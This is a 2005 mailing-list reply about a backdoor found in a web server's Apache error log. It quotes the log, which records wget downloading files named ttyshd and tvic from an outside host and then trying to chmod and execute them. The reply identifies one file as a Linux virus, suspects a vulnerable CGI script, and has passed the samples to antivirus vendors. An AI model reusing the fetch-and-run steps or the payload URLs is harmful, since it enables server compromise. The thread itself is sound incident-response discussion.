Re: backdoor named tvic / Kayten / ttyshd download in apache logfile
From: Chris Kronberg (smil_at_agleia.de)
Date: 04/24/05
- Previous message: Henning: "backdoor named tvic / Kayten / ttyshd download in apache logfile"
- In reply to: Henning: "backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Next in thread: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 24 Apr 2005 17:25:39 GMT
Henning schrieb im Artikel <7d202f03.0504221425.280c724e@posting.google.com>:
> Hi,
>
> i found interesting lines in my apache2 error.log. They are not in the
> log format.
> It looks like a wget output. There was a file downloaded. I found this
> file and it seems to be an backdoor.
> In the ELF Binary named tvic: 'Kayten Start backdoor for you'.
> What is this. And how can my apache download this?
> I found no normal access/error entrys at that timestamp 16:30 to 16:32
> whith active perl/php access.
> The tvic file ist still on that server (ilovekida.com <- this is not
> mine).
Downloaded both of them for analysis. The first one identifies as
Linux/Backegmm virus, the second one might be exactly what strings
reveal: An open webmail client. Presumably for spamming. I file
that one to some antivirus vendors. Their equipment is much better
than mine. :-)
Concerning your question: Do you have any cgi script running on
your webserver? People try that every now and again. Yet I have
never seen any entry like that in my log files.
The other reason I can think of is, that for what reason so ever
another application is writing to the file descriptor of the error
log. If this is the case your system might in real trouble.
Cheers,
Chris.
> LogQute
> Snip
>
> [Thu Apr 21 15:50:32 2005] [error] [client **********] File does not
> exist: ******
> --16:31:28-- http://www.ilovekida.com/ttyshd
> => `ttyshd'
> Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
> 68.142.234.38, ...
> Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,179 [application/octet-stream]
> ttyshd: Permission denied
>
> Cannot write to `ttyshd' (Permission denied).
> --16:32:11-- http://www.ilovekida.com/v1c11/tvic
> => `tvic'
> Resolving www.ilovekida.com... 68.142.234.38, 68.142.234.36,
> 68.142.234.37, ...
> Connecting to www.ilovekida.com[68.142.234.38]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 17,856 [application/octet-stream]
> tvic: Permission denied
>
> Cannot write to `tvic' (Permission denied).
> sh: line 1: ./ttyshd: Permission denied
> chmod: changing permissions of `ttyshd': Operation not permitted
> sh: line 1: ./ttyshd: Permission denied
> sh: line 1: ttyshd: command not found
> --16:35:01-- http://www.ilovekida.com/v1c11/tvic
> => `tvic'
> Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
> 68.142.234.38, ...
> Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 17,856 [application/octet-stream]
>
> 0K .......... ....... 100%
> 87.46 KB/s
>
> 16:35:02 (87.46 KB/s) - `tvic' saved [17856/17856]
>
> [Thu Apr 21 16:50:29 2005] [error] [client *****] Name "main::path"
> used only once: possible typo at ********
- Previous message: Henning: "backdoor named tvic / Kayten / ttyshd download in apache logfile"
- In reply to: Henning: "backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Next in thread: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
